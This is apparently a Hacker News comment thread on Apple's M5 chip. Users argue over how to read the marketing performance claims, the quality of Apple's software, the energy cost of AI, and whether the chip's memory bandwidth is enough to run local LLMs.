M5 is 4-6x more powerful than M4, which was 5x more powerful than M3, which was 4x more powerful than M2, which was 4x more powerful than M1, which itself was 6x faster than an equivalent Intel processor. Great!

Looking at my MacBook, though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago.

So, where is the disconnect here? Why is actual user experience not able to keep up with benchmarks and marketing?

  • quitit 5 hours ago

    You wrote:

    >Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago. So, where is the disconnect here?

    They wrote:

    > Together, they deliver up to 15 percent faster multithreaded performance over M4

    The problem is comprehension, not marketing.

    • Choco31415 4 hours ago

      Not quite. The announcement mentions that:

      “M5 delivers over 4x the peak GPU compute performance for AI”

      In this situation, at least, it’s just referring to AI compute power.

      • mort96 an hour ago

        Their "peak GPU compute performance for AI" is quite different from your unqualified "performance". I don't know what figures they're quoting, but something stupid like supporting 4-bit floats while the predecessor only supported down to 16-bit floats could easily deliver "over 4x peak GPU compute performance for AI" (measured in FLOPS) without actually making the hardware significantly faster.

        Did they claim 4x peak GPU compute going from the M3 to M4? Or M2 to M3? Can you link to these claims? Are you sure they weren't boasting about other metrics being improved by some multiplier? Not every metric is the same, and different metrics don't necessarily stack with each other.

      • teaearlgraycold 2 hours ago

        Much of this is probably down to optimized transformer kernels.

    • CryptoBanker 5 hours ago

      I think you’re the one misreading here. The 15% refers to CPU speed, while the 6x etc. multiples refer to GPU speed.

      • graeme 4 hours ago

        GPU for AI workloads. That plausibly is that much faster, as the Intel laptops with integrated GPUs weren't made for that workload.

  • thebitguru 5 hours ago

    Apple has also seemingly stopped caring about the quality and efficiency of their software. You can see this especially in the latest iOS/iPadOS/macOS 26 versions of their operating systems. They need their software leadership to match their hardware leadership; otherwise good hardware with bad software still leads to a bad product, which is what we are seeing now.

    • heresie-dabord 5 hours ago

      > Apple has also seemingly stopped caring about the quality and efficiency of their software.

      Hardware has improved significantly, but it needs software to enable me to enjoy using it.

      Apple is not the only major company that has completely abandoned the users.

      The fastest CPUs and GPUs with the most RAM will not make me happier being targeted by commercial surveillance mechanisms, social-media applications, and hallucinating LLM systems.

    • Rover222 3 hours ago

      iOS 26 is so bad. It's the first time I've really felt annoyed daily when using an Apple device. Basically on par with my Android experiences now.

    • taf2 5 hours ago

      I think 15.6.1 (24G90) will be my last macOS... Omarchy is blazing fast.

    • drcongo 5 hours ago

      I see this sentiment a lot, but I've found the OS26 releases to be considerably better than the last few years' OS releases, especially macOS which actually feels coherent now compared to the last few years of janky half baked UI.

    • cmcaleer 5 hours ago

      It is frankly ridiculous how unintuitive it was to add an email account to Mail on iOS. This is possibly the most basic functionality I would expect an email client to have. One would expect that they go to their list of mailboxes and add a new account.

      No. You exit the Mail app -> go to Settings -> Apps -> scroll through a massive list (that you usually just use for notification settings, btw) to get to Mail -> Mail Accounts -> add new account.

      Just a simple six-step process after you’ve already hunted for it in the mail app.

      • jrmg 5 hours ago

        There’s an “Accounts...” entry in the main “Mail” menu.

        You can also click the “+” button at the bottom of the list of accounts in the “Accounts” panel in Mail's settings window.

      • ant6n 5 hours ago

        I think the most basic email integration I want from Apple is the ability to set another email program besides “Mail” as the default, without having to set up Mail first.

  • random3 5 hours ago

    The disconnect is that you're reading sideways.

    First line on their website:

    > M5 delivers over 4x the peak GPU compute performance for AI compared to M4

    It's the GPU, not the CPU (which is what you're comparing with your old Intel), and it's an AI workload, not your regular workload (which, again, is what you're comparing).

    • bangaladore 5 hours ago

      And they are comparing peak compute. Which means essentially nothing.

      • random3 5 hours ago

        There was a time when Apple decided that throwing around random technical numbers shouldn't be the news (that came after the megahertz-counting era). This has been changing post-Steve Jobs. That said, this is a chip announcement rather than a product announcement, so maybe the numbers are the news.

        • edmundsauto 4 hours ago

          They also lost big during the megahertz wars. Consumers made it clear that they wanted to see number go up and voted with their wallet. There is probably still some cultural remnant of that era.

      • tempodox 5 hours ago

        Do not trust any statistics you did not fake yourself.

  • cj 5 hours ago

    I’m not sure I see the disconnect.

    At our company we used to buy everyone MacBook Pros by default.

    After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white-collar worker (they seem like “actual” pro machines now), to the point where we now order MacBook Airs for new employees.

    I feel like until recently, you really needed a MBP to get a decent UX (even just using chrome). But now there doesn’t seem to be a major compromise when buying an Air for half the price, at least compared to 3-5 years ago.

    • wlesieutre 5 hours ago

      What's crazy about that to me is that the MacBook Air doesn't even have a fan. The power efficiency of the ARM chips is really something.

      • mort96 an hour ago

        Well, the power efficiency of Apple Silicon combined with their firmware and drivers is really something. ARM doesn't have much to do with it.

    • charliebwrites 5 hours ago

      Anecdotal, but I switched to an M3 MBA from an M1 MBP for my iOS and other dev related work

      I’ve had zero problems with lag or compile time (prior to macOS 26 anyway)

      The only thing it can’t do is run Ableton with low latency without heavily changing the defaults

      You press a key on the keyboard to play a note and half a second later you hear it

      Other than that, zero regrets

      • cyberpunk 4 hours ago

        That’s weird, my M1 Air handles Ableton absolutely fine.

        Something’s off with your setup.

    • hibikir 2 hours ago

      In 2021, we bought everyone M1 Pros with 32 gigs of RAM. Historically, keeping a developer on a 4-year-old laptop would have been crazy, but nobody is really calling for upgrades like we did back when we got rid of the Intels.

    • hartator 5 hours ago

      > After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order regular MacBooks (not Pro’s) for new employees

      Regular MBs are not really a thing anymore. You mean Airs?

      • cj 5 hours ago

        Yes, fixed!

    • ahmeneeroe-v2 4 hours ago

      Absolutely true. I now know that I only need an MBA, not an MBP.

  • leakycap 4 hours ago

    > So, where is the disconnect here?

    > I can say with utmost certainty that it isn't 4000x faster

    The numbers you provided do not come to 4000x faster (closer to 2400x)

    > Why is actual user experience not able to keep up with benchmarks and marketing?

    Benchmarks and marketing are very different things, but you seem to be holding them up as similar here.

    The 5x, 6x, 4x numbers you cite come from marketing across many years and don't even refer to the same thing. You're giving numbers with no context, which implies you're mixing them up, and the marketing worked, because the only thing you're recalling is the big number.

    Every M-series chip is a HUGE advancement over the past in GPU terms. Most of the "5x" performance jumps you describe are in graphics processing, and the "Intel" they're comparing against is often an Intel iGPU like the Iris Xe or UHD series. These were low-end trash iGPUs even when Apple launched those Intel devices, so part of why the M1's "5x" impressed was that the Intel Macs had such terrible integrated graphics.

    The M1 was a giant jump in overall system responsiveness, and the M-series seems to be averaging about a 20% meaningful speed increase year over year. If you use AI/ML/GPU, the M-series yearly upgrade is even better. Otherwise, for most things it's a nice and noticeable bump, but not an Intel-to-M1 jump, even from M1 to M4.

  • condiment 5 hours ago

    It's GPU performance.

    Spin up ollama and run some inference on your 5-year-old intel macbook. You won't see 4000x performance improvement (because performance is bottlenecked outside of the GPU), but you might be in the right order of magnitude.

    • blihp 5 hours ago

      Not possible given the anemic memory bandwidth [1]... you can scale up the compute all you want but if the memory doesn't scale up as well you're not going to see anywhere near those numbers.

      [1] The memory bandwidth is fine for CPU workloads, but not for GPU / NN workloads.

    • jandrese 5 hours ago

      Comparing GPU performance to some half-decade-old Intel iGPU seems like lying with statistics.

      "Look how many times faster our car is![1]"

      [1] Compared to a paraplegic octogenarian in a broken wheelchair!

      • umanwizard 5 hours ago

        Well, Apple isn’t making that comparison, the OP was.

  • semiinfinitely 5 hours ago

    All those extra flops are spent computing light refraction in the liquid glass of the ui

  • 0x457 5 hours ago

    Well, if you read the very next thing after 4x, you will notice it says "the peak GPU compute performance for AI compared to M4".

    The disconnect here is that you can't read. Sorry, no other way to say it.

  • tylerhou 5 hours ago

    > M5 is 4-6x more powerful than M4

    In GPU performance (probably measured on a specific set of tasks).

  • james4k 5 hours ago

    Those marketing claims are each about a very specific workload, not about general performance. Yes, it is often misleading.

  • tmountain 5 hours ago

    Probably synthetic benchmarks that don't represent actual bottlenecks in application usage. How much of what you are doing is actually CPU bound? Your machine still has to do I/O, and even though that's "very fast" these days, it's not happening inside your CPU, so you'll only see the gains when running workloads that benefit from them (i.e., complex calculations that can live in the CPU and its cache).

  • vintagedave 5 hours ago

    What scares me is that my M2 started seeing performance issues in macOS recently. Safari is sometimes slow (I admit I stress it with many tabs, but it wasn't like this a year ago). Somehow graphics in general seem slower on Tahoe, e.g. the effects when minimising a window.

    I am deeply concerned all the performance benefits of the new chips will get eaten away.

    • MobiusHorizons 5 hours ago

      You are probably actually witnessing the reduction in performance of swap as your drive fills up. Check the memory pressure in Activity Monitor. The fix is pretty easy (delete stuff).

      • vintagedave 4 hours ago

        Thanks, but I have over a hundred gigs free. And I got the max RAM I could (24 GB). I feel like the machine _should_ be capable in 2025.

    • Tagbert 5 hours ago

      26.0 is very much a dot-zero release. It is missing a lot of optimizations, and there are some open bugs, like memory leaks. Initial reports on 26.1 show a lot of improvement in those areas. The third beta of 26.1 just came out yesterday. They will probably launch this new version, with improved optimizations, by the end of October.

  • omikun 3 hours ago

    Says M5 is 4x faster than M4 and 6x faster than M1 for AI compute on the GPU. Basically, M4 was only a little faster than M1 at this task. E.g., if M5 is 24 AI TOPS, M4 is 6 AI TOPS, and M1 is 4 AI TOPS.

    Unless you're looking at your MacBook running LM Studio, you won't see much improvement in this regard.

  • justinator 5 hours ago

    You know, 64% of statistics are made up.

  • monocasa 5 hours ago

    Each is a different specific benchmark, so they don't stack the way you're stacking them.

    This one is 4-6x faster at AI, for instance.

  • foota 5 hours ago

    User experience (for most things, unless you sit there encoding video all day) isn't really related to raw performance so much as latency. Processor power can help there, but design and, at the limit, memory latency are the key constraints.

  • Jnr 5 hours ago

    It states it is "peak performance". Probably in a very specific use case. Or maybe it reaches the peak for an extremely short period of time before it drops the performance.

  • freehorse 5 hours ago

    They are not 4x more powerful than the previous generation at everything, or even at the same thing every time, so it does not stack up. Here the 4x refers to something related to LLMs running on the GPU.

    I use both an M1 Max and an M3 Max, and frankly I do not notice much difference in most stuff if you control for the core count. And for running LLMs they are almost the same performance. I think from M1 to M3 there was not much performance increase in general.

  • oulipo2 5 hours ago

    Agreed. If I have 40 tabs open in Chrome, my M1 MacBook is no longer responsive... I'm not sure about their performance claims, apart from some niche GPU rendering for games, which constitutes about 0% of my daily laptop usage.

  • tester756 5 hours ago

    Because this is bullshit, lies, marketing

  • potatolicious 4 hours ago

    Because there's more to "actual user experience" than peak CPU/GPU/NPU workload.

    Firstly, the M5 isn't 4-6x more powerful than M4 - the claim is only for GPU, only for one narrow workload, not overall performance uplift. Overall performance uplift looks like ~20% over M4, and probably +100% over M1 or so.

    But there is absolutely a massive sea change in the MacBook since Intel 5 years ago: your peak workloads haven't changed much, but the hardware improvements give you radically different UX.

    For one thing, the Intel laptops absolutely burned through the battery. Five years ago the notion of the all-day laptop was a fantasy. Even relatively light users were tethered to chargers most of the day. This is now almost fully a thing of the past. Unless your workloads are very heavy, it is now safe to charge the laptop once a day. I can go many hours in my workday without charging. I can go through a long flight without any battery anxiety. This is a massive change in how people use laptops.

    Secondly is heat and comfort. The Intel Macs spun their fans up at even mild workloads, creating noise and heat - they were often very uncomfortably warm. Similar workloads are now completely silent with the device barely getting warmer than ambient temp.

    Thirdly is allowing more advanced uses on lower-spec and less expensive machines. For example, the notion of rendering and editing video on an Intel MacBook Air was a total pipe dream. Now a base-spec MacBook Air can do... a lot that once forced you into a much higher price point/size/weight.

    A lot of these HN conversations feel like sports car fans complaining: "all this R&D and why doesn't my car go 500mph yet?" - there are other dimensions being optimized for!

yalogin 7 hours ago

It feels like Apple is “a square peg in a round hole” when it comes to AI, at least for now.

They are not the hardware provider like Nvidia, and they don't do the software and services like OpenAI or even Microsoft/Oracle. So they are struggling to find a foothold here. I am sure they are working on a lot of things, but the only way to showcase them is through their phone, which ironically feels like not the best path for Apple.

Apple’s best option is to put LLMs locally on the phone and claim privacy (which is true), but they may end up in the same Siri-vs-others situation, where Siri is always the dumber one.

It will be interesting to see how this plays out.

  • mirekrusin 7 hours ago

    Being late to the AI race, or not entering it from the training side, is not necessarily bad; others have burned tons of money. If Apple enters with their hardware first (only?), it may disrupt the status quo from the consumer side. It's not impossible that they'll produce hardware everybody will want for running local models that are on par with closed ones. If that happens, it may change how real money flows (as opposed to investor money based on imaginary valuations, which can evaporate).

  • mft_ 5 hours ago

    They are the leader in manufacturing consumer systems with sufficient high-bandwidth memory to enable decent-sized LLMs to run locally with reasonable performance. If you want to run something that needs >=32GB of memory (which is frankly bottom-end for a somewhat capable LLM), they're your only widely available choice (otherwise you've got the rare Strix Halo AI Max+ 395 chip, or you need multiple GPUs, or maybe a self-build based around a Threadripper).

    This might not be widely recognised, as the proportion of people wanting to run capable LLMs locally is likely a rounding error versus the people who use ChatGPT/Claude/Gemini regularly. It's also not something that Apple markets on, as they can't monetize it. However, as time goes on and memory and compute power gradually decrease in price, and also maybe as local LLMs continue to increase in ability (?), it may become more and more relevant.

    • yalogin 3 hours ago

      None of the current use cases, the ones that caught the public eye, really need locally run LLMs. Apple has to come up with functionality that can work with on-device LLMs, and that is hard to do. There aren't that many use cases for it, as the input vectors all map to an app or camera. Even then, a full-fledged LLM is always better than a quantized, low-precision one running locally. Yeah, increased compute is the way, but it's not a silver bullet, as vision- and audio-bound LLMs require large amounts of memory.

Noaidi 8 hours ago

I am wondering if Apple's focus is off lately with this drive for AI. So far all they are showing in that presentation is that I can have

"the ability to transform 2D photos into spatial scenes in the Photos app, or generating a Persona — operate with greater speed and efficiency."

And by making Apple AI (which is something I do not use, for many reasons, but mainly because of climate change) their focus, I am afraid they are losing their way and making their operating systems worse.

For instance, Liquid Glass, the mess I was lucky enough to uninstall before they put in the embargo against doing so, is, well, a mess. An alpha release, in my opinion, which I feel was a distraction from their lack of a robust AI release.

So by blowing money on the AI gold rush that they were too late for, will they ultimately ruin their products across the board?

I am currently attempting to sell my iPhone 16E and my M1 Macbook Air to move back to Linux because of all of this.

  • Tagbert 5 hours ago

    Most of the AI and machine learning Apple has done so far runs primarily on device, so you can judge for yourself whether there is any climate-change concern or not.

  • knotimpressed 8 hours ago

    Assuming you've read https://andymasley.substack.com/p/a-cheat-sheet-for-conversa... or the longer full essay/related works, could you elaborate on why you don't use Apple Intelligence?

    I totally understand why someone would refuse to use it due to environmental reasons (amongst others) but I'm curious to hear your opinions on it.

    • Noaidi 7 hours ago

      Some commenters already answered for me. To me there is no real use benefit. I am rather a simple user, and it seems to take up space on the phone as well. I refuse to use iCloud, so space is important to me, since photography is what I do the most.

      Also, I like researching things old school, the way I learned in college, because I think it leads to unintended discoveries.

      I do not trust the source you linked to. It is an organization buried under organizations, and I could not find their funding source after looking for a good 15 minutes this morning. It led me back to https://ev.org/ where I found out one guy used to work for "Bain and Company", a consulting firm, and was associated with FTX funding:

      https://oxfordclarion.uk/wytham-abbey-and-the-end-of-the-eff...

      Besides "Effective Altruism" makes no sense to me. Altruism is Altruism IMO.

      Altruism: unselfish regard for or devotion to the welfare of others

      There is no way to be ineffective at altruism. The more you have to think about altruism the further you get from it.

      But the organization strikes me as some kind of tech propaganda arm.

    • sylens 7 hours ago

      > could you elaborate on why you don't use Apple Intelligence?

      Why would I trust this when they can't deliver a voice assistant that can parse my sentences beyond "Set a reminder" or "Set a timer"? They have neglected this area of their products for over a decade; they are not owed the benefit of the doubt.

    • adastra22 3 hours ago

      > I totally understand why someone would refuse to use it due to environmental reasons

      Huh. This one baffles me.

    • pcdoodle 7 hours ago

      For me: unproven trust and no killer feature.

      If I can't search my Apple Mail without AI, why would I trust AI?

    • timeon 6 hours ago

      Not sure why one would think that article is anything other than an attempt at distraction, because emissions add up.

      I'm from a country (in Europe) where CO2 emissions per capita [0] are 5.57 tonnes while the number for the USA is 14.3, so reading the sentence "The average American uses ~50,000 times as much water every day..." in that article surely does not imply that one should use ChatGPT because it is nothing. If the "average American" wants to decrease emissions, then not using LLMs is just a start.

      [0]: https://ourworldindata.org/grapher/co-emissions-per-capita

  • StopDisinfo910 8 hours ago

    > making Apple AI [...] their focus

    Are they really doing that? Because if so, they have shockingly little to show for it.

    Their last few attempts at actual innovation seem to have been less than successful. The Vision Pro failed to find an audience. Liquid Glass is, to put it politely, divisive.

    At this point, it seems to me that good SoCs and a captive audience in the US are pretty much all they have left, and competition on the SoC front is becoming fierce.

    • Noaidi 7 hours ago

      Yeah, I agree, they have a captive audience for sure. But they still need to satisfy shareholders. If people are failing to upgrade, that is a problem. And the battery drain on my iPhone 16e on Glass was horrific. I know casual users who did not notice until I pointed it out, and then they tracked it more closely. This, unfortunately, makes me think conspiratorially: even a modest amount of extra battery use and degradation will mean more upgrades in the future.

      But I think $500 billion is a lot of money for AI:

      Apple accelerates AI investment with $500B for skills, infrastructure

      https://www.ciodive.com/news/Apple-AI-infrastructure-investm...

      Imagine using that $500 billion on the operating system, squashing bugs, or making the system even more energy efficient? Or maybe figuring out how to connect to an Android tablet's file system natively?

  • steinvakt2 8 hours ago

    If you don’t use AI for climate reasons, then you should read the recent reports about how little electricity and water are actually used. It's basically zero (image and video models excluded). Your information about this is probably based on GPT-3.5 or something, which is now 3 years old, a lifetime in the AI world.

    • greekrich92 8 hours ago

      Big data centers running tons of GPUs, and the construction of even bigger ones, are not carbon neutral, come on.

    • wat10000 8 hours ago

      Don't newer models use more energy? I thought they were getting bigger and more computationally intensive.

      • trenchpilgrim 8 hours ago

        They use a massive amount of energy during training. During inference they use a tiny amount of energy, less than a web search (turns out you can be really efficient if you don't mind giving wrong answers at random, and can therefore skip expensive database queries!)

        • wat10000 6 hours ago

          Right, but the comment I was responding to suggested that ChatGPT3.5 used lots of energy and newer models use less.

          • trenchpilgrim 3 hours ago

            Indeed, this is correct. See today's Claude Haiku 4 announcement for an example.

  • imcritic 8 hours ago

    I think they will continue ruining their products via software updates. That's implied by the walled-garden approach they chose for their business: it forces users to consoom more and thus generates profits. Apple isn't a "lean" company; it needs outrageous profits to stay afloat.

  • jeffbee 7 hours ago

    I'm interested in reading about your low-carbon lifestyle that is so efficient you got to the point of giving up machine inference.

    • Noaidi 6 hours ago

      I live in a van full time. I have a 200W solar panel and a 1500W-output solar battery that powers everything I use, mostly for cooking, sometimes heat. I also poop in the woods a lot. :) I do not use the internet much, really. Driving is my biggest carbon footprint, but I really do not put in much more mileage than the average suburban person. Anyway, I try my best. I am permanently disabled, so that makes a lot of it easier. Being poor dramatically lowers one's carbon footprint.

      • jeffbee 5 hours ago

        If you drive a van as much as the average suburbanite drives their vehicle, emitting ~10 metric tons of CO2 annually, posting about how you gave up local machine inference for the climate is performative and asinine. Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less.
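
          For what it's worth, a sketch of the arithmetic behind that equivalence, assuming the EPA's ~8.9 kg of CO2 per gallon of gasoline and Google's reported ~0.03 g CO2e per median Gemini text prompt (both figures are assumptions added here, not from the comment):

            kg_co2_per_gallon = 8.887       # EPA estimate for gasoline
            g_per_gemini_prompt = 0.03      # Google's reported median (assumption)
            total_g = 1000 * kg_co2_per_gallon * 1000
            print(total_g / g_per_gemini_prompt)  # ~2.96e8, i.e. ~300 million prompts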

        • leakycap 3 hours ago

          What a nice way to talk to another person who... didn't attack you?

          A typical passenger car driving 12,000 miles puts out about 5 metric tons of CO2.

          The person driving that passenger car likely has a 1,000 sq ft or larger home or apartment, which can vary widely but could be reasonably estimated at another 5 metric tons of CO2 (Miami vs. Minnesota makes a huge difference).

          So we're at 10 metric tons for someone who doesn't live in a van but still drives like a suburbanite

          Care to be a little kinder next time you feel whatever compelled you to write your response to the other user? Jeesh.

        • Noaidi 2 hours ago

          First, I need my van. My van is my house.

          > Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less

          Still, even if your numbers are correct (and I feel they are not), does that mean I should just add to the problem and use something I do not need?

          Driving my van for my yearly average creates about 4.4 metric tons of CO2.

          "A more recent study reported that training GPT-3 with 175 billion parameters consumed 1287 MWh of electricity, and resulted in carbon emissions of 502 metric tons of carbon, equivalent to driving 112 gasoline powered cars for a year."

          https://news.climate.columbia.edu/2023/06/09/ais-growing-car...
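
          As a sanity check, that equivalence is roughly consistent with the EPA's oft-cited ~4.6 metric tons of CO2 per typical passenger car per year (the per-car figure is an assumption added here, not from the article):

            training_tons = 502         # GPT-3 training estimate from the article
            tons_per_car_year = 4.6     # EPA figure for a typical passenger car
            print(training_tons / tons_per_car_year)  # ~109 car-years, close to "112 cars"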

          Just to get an idea of how I conserve, another example is that I only watch videos in 480p because it uses less power. This has a double benefit for me, since it saves my solar battery as well.

          I am not bragging, just showing what is possible. Right now, being still this week in the desert, my carbon footprint is extremely low.

          Second, I cannot really trust most numbers that are coming out regarding AI. Sorry, just too much confusion and greenwashing. For example, Meta is building an AI site that is about the size of Manhattan. Is all the carbon used to build that counted in the equations?

          But this paper from 5/25:

          https://www.technologyreview.com/2025/05/20/1116327/ai-energ...

          says "by 2028 more than half of the electricity going to data centers will be used for AI. At that point, AI alone could consume as much electricity annually as 22% of all US households."

          And

          "Tallies of AI’s energy use often short-circuit the conversation—either by scolding individual behavior, or by triggering comparisons to bigger climate offenders. Both reactions dodge the point: AI is unavoidable, and even if a single query is low-impact, governments and companies are now shaping a much larger energy future around AI’s needs."

          And

          "The Lawrence Berkeley researchers offered a blunt critique of where things stand, saying that the information disclosed by tech companies, data center operators, utility companies, and hardware manufacturers is simply not enough to make reasonable projections about the unprecedented energy demands of this future or estimate the emissions it will create. "

          So the confusion and obfuscation are enough for me to avoid it. I think AI should be restricted to research, not used for most of the silliness and AI slop that is being produced. Because, you know, we are not even counting the AI slop views that also take up data space and energy from people looking at it all.

          But part of why I do not use it is my little boycott. I do not like AI, at least how it is being misused to create porn and AI slop instead of doing the great things it might do. They are misusing AI to make a profit. And that is also what I protest.

    • timeon 6 hours ago

      Depends where you are. People in some countries have a lot of catching up to do: https://ourworldindata.org/grapher/co-emissions-per-capita

      Maybe they are in the USA, where every little thing counts.

      • Noaidi 6 hours ago

        I am in the US, and thanks for that link. I am of the opinion that the Climate Crisis should be the number one focus for everyone right now.

        So, to keep this on point, Apple making a faster chip is not on my climate change agenda and is, if anything, a negative.

      • jeffbee 5 hours ago

        No, in the USA it is the opposite. The little things do not and cannot add up to anything. The only things that make a difference are motor fuels and hamburgers.

nik736 8 hours ago

This is only the base model; no upgrades yet for the Pro/Max versions. The memory bandwidth is 153 GB/s, which is not enough to run capable open-source LLMs properly.

  • replete an hour ago

    Looks like the M5 base has LPDDR5X-9600, which works out to 153.6 GB/s, up from the base M4's 120 GB/s of LPDDR5X-7500. The Pro/Max versions have more memory controllers: 16, 24, and 32 channels respectively. The 32-channel top-end M5 will have 614 GB/s by my calculations.

    It would take 48 channels of LPDDR5X-9600 to match a 3090's memory bandwidth, so the situation is unlikely to change for a couple of years, until LPDDR6 arrives, I guess.
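
    A quick sketch of that arithmetic, assuming 16-bit LPDDR5X channels (so peak bandwidth = transfer rate × channels × 2 bytes):

      def lpddr_bandwidth_gb_s(mt_per_s, channels, channel_bits=16):
          """Peak bandwidth in GB/s: transfers/sec x bits/transfer, summed across channels."""
          return mt_per_s * channels * channel_bits / 8 / 1000

      print(lpddr_bandwidth_gb_s(7500, 8))   # base M4:  120.0 GB/s
      print(lpddr_bandwidth_gb_s(9600, 8))   # base M5:  153.6 GB/s
      print(lpddr_bandwidth_gb_s(9600, 32))  # 32-channel top end: 614.4 GB/s
      print(lpddr_bandwidth_gb_s(9600, 48))  # 921.6 GB/s, approaching a 3090's ~936 GB/s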

  • wizee 8 hours ago

    153 GB/s is not bad at all for a base model; the Nvidia DGX Spark has only 273 GB/s memory bandwidth despite being billed as a desktop "AI supercomputer".

    Models like Qwen 3 30B-A3B and GPT-OSS 20B, both quite decent, should be able to run at 30+ tokens/sec at typical (4-bit) quantizations.
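
    A rough sanity check on that estimate, assuming decode is memory-bandwidth-bound and each token reads roughly (active parameters × bytes per weight); the ~3B-active figure comes from the model's "A3B" name, the rest is napkin math:

      bandwidth_gb_s = 153.6       # base M5
      active_params_b = 3.0        # billions of *active* params in the 30B-A3B MoE
      bytes_per_param = 0.5        # 4-bit quantization
      gb_per_token = active_params_b * bytes_per_param  # ~1.5 GB read per token
      print(bandwidth_gb_s / gb_per_token)              # ~102 tokens/sec ceiling
      # Real-world throughput lands well below this ceiling, so 30+ tok/s is plausible.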

    • zamadatix 7 hours ago

      Even at 1.8x the base memory bandwidth and 4x the memory capacity Nvidia spent a lot of time talking about how you can pair two DGXs together with the 200G NIC to be able to slowly run quantized versions of the models everyone was actually interested in.

      Neither product actually qualifies for the task IMO, and that doesn't change just because two companies advertised them as such instead of just one. The absolute highest end Apple Silicon variants tend to be a bit more reasonable, but the price advantage goes out the window too.

      • cma 7 hours ago

        The M5 has 3x Thunderbolt 5, so it should be able to do 240G bidirectional in total. Not that useful yet with a max of 32GB of RAM, though.

  • mpeg 8 hours ago

    The memory capacity to me is an even bigger problem, at 32GB max.

    • sgt 8 hours ago

      That'll come in the MacBook Pro etc. cycle, like last time; then you'll have 512GB RAM

      • bombcar 8 hours ago

        Is the M4 Ultra even out yet? I can't see anything with 512 GB except the M3 Ultra on the Mac Studio (for a cool $4000 more).

        • asimovDev 7 hours ago

          I am interested in seeing if they skip the M4 and go straight to M5, and only make that available in the Pro. From my unscientific observations it seems that chips are running hotter and hotter; I wouldn't be surprised if an M5 Ultra would struggle in a Studio and would require the cooling performance of the Mac Pro case.

      • mpeg 8 hours ago

        Same with bandwidth though, usually pro/max memory has much higher speed

        • andy_ppp 7 hours ago

            Yes, the M4 base has 120 GB/s, the Pro 273 GB/s, and the Max 546 GB/s... That means the M5 Pro is potentially around 348 GB/s and the M5 Max almost 700 GB/s; for comparison, a 4090 has around 1,000 GB/s. So pretty incredible!
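
            Those projections appear to be the M4 tiers scaled by the LPDDR5X data-rate bump (9600/7500 = 1.28); a minimal sketch of that reasoning:

              m4_tiers = {"base": 120, "Pro": 273, "Max": 546}  # GB/s
              scale = 9600 / 7500                               # LPDDR5X-9600 vs. -7500
              for tier, bw in m4_tiers.items():
                  print(tier, round(bw * scale, 1))             # 153.6, 349.4, 698.9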

          • replete an hour ago

              I think the M5 Max will be more like 614GB/s, unless they somehow exceed LPDDR5X-9600 or add more than 32 memory controllers.

          • sgt 5 hours ago

              Also, I think even an M3 Ultra is more cost-effective at running LLMs than a 4090 or 5090, mostly due to being more energy efficient. And less fragile than a gamer PC build.

            • andy_ppp 4 hours ago

                It can run larger models, albeit quite slowly, but lacks the matmul acceleration (included in the M5) that is very useful for context and prompt processing performance at inference time. I will probably burn my budget on an M5 Max with 256GB (maybe even 512GB) of memory; the price will be upsetting, but I guess that is life!

              • sgt 3 hours ago

                  Yes! I think smaller models on the M3 Ultra are interesting enough, but now with matmul/tensor support on an M5 Ultra or Max, with decent unified memory, it will be a game changer.

                I can easily imagine companies running Mac Studios in prod. Apple should release another Xserve.

    • iyn 7 hours ago

      Yeah, that's my main bottleneck too. Constantly at 90%+ RAM utilization with my 64GiB (VMs, IDEs etc.). Hoping to go with at least 128GiB (or more) once M5 Max is released.

  • czbond 8 hours ago

    I am interested to learn why models move so much data per second. Where could I learn more that is not a ChatGPT session?

    • Sohcahtoa82 6 hours ago

      Models are made of "parameters" which are really weights in a large neural network. For each token generated, each parameter needs to take its turn inside the CPU/GPU to be calculated.

      So if you have a 7B parameter model with 16-bit quantization, that means you'll have 14 GB/s of data coming in. If you only have 153 GB/sec of memory bandwidth, that means you'll cap out at ~11 tokens/sec, regardless of how much processing power you have.

      You can of course quantize to 8-bit or even 4-bit, or use a smaller model, but doing so makes your model dumber. There's a trade-off between performance and capability.
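
      With the units fixed per the correction below (GB per token, not GB/s), the arithmetic works out as in this sketch:

        params = 7e9                   # 7B parameters
        bytes_per_param = 2            # 16-bit weights
        bandwidth = 153.6e9            # base M5, bytes/sec
        print(params * bytes_per_param / 1e9)          # 14 GB read per token
        print(bandwidth / (params * bytes_per_param))  # ~11 tokens/sec ceiling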

      • adastra22 3 hours ago

        I think you mean GB/token

        • Sohcahtoa82 3 hours ago

          Err...yup. My bad. Can't edit it now.

    • modeless 8 hours ago

      The models (weights and activations and caches) can fill all the memory you have and more, and to a first (very rough) approximation every byte needs to be accessed for each token generated. You can see how that would add up.

      I highly recommend Andrej Karpathy's videos if you want to learn details.

      • pfortuny 7 hours ago

        A very simplified version is: you need the whole matrix to compute a matrix × vector product, even if the vector is mostly zeroes. Edit: obviously my simplification is wrong, but if you add in compression etc. you get the idea.
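
        In other words, for y = Wx every entry of W is read once, so a single token costs about m·n·(bytes per weight) of memory traffic per layer, no matter how sparse x is; a tiny sketch (sizes invented for illustration):

          m, n, bytes_per_weight = 4096, 4096, 2
          print(m * n * bytes_per_weight / 1e6)  # ~33.6 MB of weight traffic per layer, per token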

      • rs186 6 hours ago

        Would you mind specifying which video(s)? He has quite a lot of content to consume.

  • diabllicseagull 7 hours ago

    You don’t want to be bandwidth-bound, sure. But it all depends on how much compute power you have to begin with. 153 GB/s is probably not enough bandwidth for an RTX 5090. But for the entry laptop/tablet chip M5? It's likely plenty.

  • chedabob 7 hours ago

    My guess would be those are going into the rumoured OLED models coming out next year.

  • hu3 8 hours ago

    Enough or not, they do describe it like this in an image caption:

    "M5 is Apple’s next-generation system on a chip built for AI, resulting in a faster, more efficient, and more capable chip for the 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro."

  • Tepix 7 hours ago

    With MoE LLMs like Qwen 3 30B-A3B that's no longer true.

  • quest88 8 hours ago

    What do you mean by properly? What’s the behavior one would observe if they did run an LLM?

    • burnte 8 hours ago

      "Properly" means at some arbitrary speed that the writer would describe as "fast" or "fast enough". If you have a lower demand for speed they'll run fine.

    • nik736 8 hours ago

      If you have enough memory to load a model, but not enough bandwidth to handle it, you will get a very low token/s output.

      • Rohansi 5 hours ago

